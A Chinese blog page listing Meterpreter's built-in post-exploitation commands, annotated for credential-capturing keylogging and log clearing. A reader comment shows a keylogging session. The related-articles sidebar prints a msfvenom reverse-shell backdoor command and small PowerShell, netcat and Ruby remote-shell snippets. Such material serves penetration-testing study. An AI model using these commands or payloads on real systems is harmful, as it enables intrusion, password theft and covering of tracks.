meterpreter 内置工具

最新推荐文章于 2024-04-14 15:58:06 发布
最新推荐文章于 2024-04-14 15:58:06 发布
阅读量938 收藏
点赞数
分类专栏: Hacking 文章标签: 工具 command file deprecated scripting list
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6774059
版权

meterpreter > ?

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    bgkill        Kills a background meterpreter script
    bglist        Lists running background scripts
    bgrun         Executes a meterpreter script as a background thread
    channel       Displays information about active channels
    close         Closes a channel
    exit          Terminate the meterpreter session
    help          Help menu
    info          Displays information about a Post module
    interact      Interacts with a channel
    irb           Drop into irb scripting mode
    load          Load one or more meterpreter extensions
    migrate       Migrate the server to another process
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    resource      Run the commands stored in a file
    run           Executes a meterpreter script or Post module
    use           Deprecated alias for 'load'
    write         Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    del           Delete the specified file
    download      Download a file or directory     从被溢出的主机上下载文件
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory     上传文件到被溢出主机


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log            清除日志
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getpid        Get the current process identifier
    getprivs      List all privileges available to the current process
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell   切换到OS shell环境,执行主机命令
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer       这3个用户记录键盘输入,可以记录管理员登陆密码等
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description

网友评论
  • 回复 1pilove3102011-04-19 16:31
    meterpreter > migrate 672
    [*] Migrating to 672...
    [*] Migration completed successfully.
    meterpreter > getpid
    Current pid: 672
    meterpreter > keyscan_start 
    Starting the keystroke sniffer...
    meterpreter > keyscan_dump  
    Dumping captured keystrokes...
     <Delete> this is lover <Return> i love my firens <Back>  <Back> dnds <Return> hah  <Ctrl>  <LCtrl> s
    meterpreter > keyscan_stop 
    Stopping the keystroke sniffer...
7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3895
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   MeterpreterMetasploit 框架中的一...
红队专题-Meterpreter
aming小老弟
09-06 601
Metasploit是一款开源的安全漏洞检测 渗透测试 工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。
MetaSploit攻击实例讲解------工具Meterpreter常用功能介绍(kali linux 2016.2(rolling))(详细)...
weixin_34077371的博客
05-20 913
      不多说,直接上干货!       说在前面的话   注意啦:Meterpreter的命令非常之多,本篇博客下面给出了所有,大家可以去看看。给出了详细的中文   由于篇幅原因,我只使用如下较常用的命令。                 这篇博客,利用下面的这个xploit/windows/browser/ms10_046_shortcut_icon_d...
后渗透工具Meterpreter(WEB安全攻防)
小英雄颂人头
03-01 1204
0xx1 后渗透工具Meterpreter 优势 纯内存工作模式,不需要对磁盘进行任何写入操作 使用加密通信协议,并且可以同时与几个信道通信 在被攻击进程内工作,不需要创建新的进程 易于在多进程之间迁移 平台通用 0xx2 进程迁移 ps – 获取目标机器进程 getpid – 查看Meterpreter shell的进程号 migrate – 进程迁移 run post...
msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)
m0_61506558的博客
09-01 4661
创建之前要是系统权限(getuid查看),要不然会出现[-] Insufficient privileges, account was not be created. 看到这个提示就需要先提权(获取到system)输入 getsystem就好了。获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。meterpreter中输入:run post/windows/gather/enum_logged_on_users。...
kali系统渗透window实现屏幕监控
鸣风
12-23 1万+
kali系统渗透window实现屏幕监控
MeterPwrShell:生成Powershell Oneliner的自动化工具,可以在Metasploit,Bypass AMSI,Bypass防火墙和FUD上创建Meterpreter Shell
03-20
生成Powershell Oneliner的自动化工具,可以在Metasploit,Bypass AMSI,Bypass防火墙和FUD上创建Meterpreter Shell 此工具由 , 和 重要的提示 切勿将本程序产生的有效负载上传到任何在线扫描仪 切勿将此程序用于...
Ninjasploit:Meterpreter扩展,用于应用钩子以避免Windows Defender内存扫描
03-08
Ninjasploit是一款针对Meterpreter的扩展工具,它的主要目标是帮助渗透测试者在进行安全评估时,能够更有效地避开Windows Defender等反病毒软件的检测。Meterpreter是一种功能强大的远程控制工具,常用于渗透测试...
Kali 常用工具
tryheart的博客
09-19 3672
MSF Metasploit Framework 开源工具,方便进行渗透测试。Ruby开发的 Auxiliaries(辅助模块):负责扫描、嗅探、指纹识别等功能 Exploit(漏洞利用模块):利用安全漏洞进行攻击行为 Payload(有效载荷模块):在渗透攻击之后,用于在目标系统上执行任意命令或者执行特定的代码 Post(后期渗透模块):用于在取得目标系统远程控制权限后,进行一系统的后渗透攻击动作 Encoders(编码工具模块):主要负责免杀 CVE Common Vulnerabiluities &a
渗透测试window7,加强木马防范意识
yuanyuan2223的博客
04-06 5628
渗透测试window7,加强木马防范意识 通过钓鱼网站给win7系统植入后门并控制的流程 一、知识点总结: 1 生成后门程序 2 通过钓鱼方式植入木马靶机(社工) 3 使用Metasploit配置监控并控制靶机 4 控制靶机我们能做什么 二、用到的系统和工具: 1 Kali(系统); 2 Windows7(靶机系统); 3 Metasploit(渗透工具); 4 msfvenom(Metasploit自带的后门生成模块); 5 Meterpreter(后渗透常用通道); 三、使用msfvenom开始生成木马
Meterpreter命令详解
weixin_45605352的博客
04-18 5002
0x01初识Meterpreter 1.1.什么是Meterpreter    MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按
内网渗透-Metasploit之——基本后渗透命令
lza20001103的博客
04-14 1037
内网渗透-Metasploit之——基本后渗透命令
【内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 5726
meterpreter使用攻略(持续更新中)
详尽的msf——meterpreter——渗透测试教程
热门推荐
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
【Linux】一步一步学Linux——ssh-keyscan命令(179)
C/C++软件工程师、嵌入式软件工程师、物联网研发工程师、C/C++讲师、物联网讲师、嵌入式讲师---欢迎大家一起交流(私信添加博主微信)
08-23 5971
00. 目录 文章目录00. 目录01. 命令概述02. 命令格式03. 常用选项04. 参考示例05. 附录 01. 命令概述 ssh-keyscan命令是一个收集大量主机公钥的实用工具。它的目的是创建和验证“ssh_known_hosts”文件。 02. 命令格式 格式: ssh-keyscan [选项] [参数] 03. 常用选项 -4 强制使用IPv4地址 -6 强制使用IPv6地址 -...
漏洞利用二:Meterpreter后期攻击方法使用
ZY95001的博客
09-04 1444
一、shell命令 1、shell (进入靶机cmd) 2、whoami命令:查看当前用户权限。 可知当进行攻击后,入侵者当前权限为最高权限用户system(win权限排名:system>administrator>普通用户) 3、net user命令:显示当前所有用户,本机为system,除此之外还存在下图另三个 4.exit退出当前路径 二、上传文件、执行操作 1.上传本机的任意文件到目标主机中。 在物理机上生成木马文件 打开软件pcshare...
反弹shell的工具
最新发布
07-24
反弹Shell是一种特殊的网络技术,允许攻击者通过网络与受害主机之间建立间接的远程连接,进而获得对该主机的完全控制权。这种技术常被黑客利用来进行持续监控、恶意软件部署、数据窃取等活动。以下是几种常用的反弹Shell工具: 1. **msfvenom (Metasploit Framework)**: Metasploit是一个强大的渗透测试框架,包含了多种攻击模块,其中包含用于生成反弹Shell的payloads。用户可以根据目标操作系统和所需执行的任务选择合适的payload。 ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -b "\x00-\xff" -f exe > backdoor.exe ``` 这条命令将生成一个Windows平台的反弹Meterpreter Shell。 2. **PowerShell**: Windows系统内置的强大脚本语言,支持复杂的任务自动化。用于构建反弹Shell时,可以结合PowerShell IEX函数或Invoke-Expression命令将远程代码注入到目标机器上执行。 ```powershell $client = New-Object System.Net.Sockets.TcpClient ("192.168.0.2", 4444) $stream = $client.GetStream() $stream.Write([text.encoding]::ASCII.GetBytes("Hello, World!"), 0, "Hello, World!" | Measure-Object).Count ``` 3. **Netcat (nc) 和类似工具**: Netcat是最常见的用于网络通信的小型实用程序之一,可以用于监听端口接收连接,也可以作为客户端发起连接,将数据作为Shell命令执行。 ``` nc -nvlp 4444 & telnet 192.168.0.2 4444 ``` 首条命令在本地运行一个监听4444端口的nc服务,第二条命令则是尝试从其他机器通过telnet连接到该端口,此时可以将返回的数据视为输入命令。 4. **Ruby**: 使用Ruby语言编写脚本来执行反弹Shell。Ruby拥有强大的字符串和进程管理能力,易于快速构建复杂的反弹Shell脚本。 示例代码片段: ```ruby require 'socket' s = TCPServer.open(4444) c, addr = s.accept print c.gets.chomp loop do cmd = c.gets.chomp c.puts `#{cmd}` end ``` 以上工具和方法都涉及到网络安全的风险评估与责任意识。在非授权的情况下使用此类技术属于非法入侵行为,违反法律法规。仅限于合法的安全审计或渗透测试环境内进行学习与研究用途。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值